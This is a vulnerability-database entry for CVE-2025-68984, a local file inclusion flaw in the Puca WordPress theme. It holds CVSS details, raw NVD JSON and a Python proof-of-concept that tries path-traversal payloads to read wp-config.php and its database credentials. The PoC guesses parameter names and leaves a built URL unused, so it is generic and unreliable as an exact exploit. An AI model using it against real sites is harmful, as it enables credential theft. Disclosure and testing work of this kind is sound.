Security Vulnerability Report
中文
CVE-2025-68984 CVSS 7.5 HIGH

CVE-2025-68984

Published: 2025-12-30 11:15:57
Last Modified: 2026-04-27 19:16:40

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Puca puca allows PHP Local File Inclusion.This issue affects Puca: from n/a through <= 2.6.39.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Puca主题 <= 2.6.39

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-68984 PoC - Local File Inclusion in Puca Theme # Target: WordPress site with Puca theme <= 2.6.39 target = "http://target-site.com" # PoC 1: Read wp-config.php payloads = [ "wp-config.php", "../../../../wp-config.php", "../../../../../../wp-config.php", "../../../../../wp-config.php" ] for payload in payloads: url = f"{target}/?theme=puca&file={payload}" # Try common parameter names used in theme params = ['file', 'template', 'page', 'include', 'load'] for param in params: try: response = requests.get(target, params={param: payload}, timeout=10) if 'DB_NAME' in response.text or 'DB_PASSWORD' in response.text: print(f"[+] Vulnerable! Found config with param={param}, payload={payload}") print(response.text[:500]) except requests.exceptions.RequestException: pass print("PoC execution completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68984", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:57.090", "lastModified": "2026-04-27T19:16:39.573", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Puca puca allows PHP Local File Inclusion.This issue affects Puca: from n/a through <= 2.6.39."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/puca/vulnerability/wordpress-puca-theme-2-6-39-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}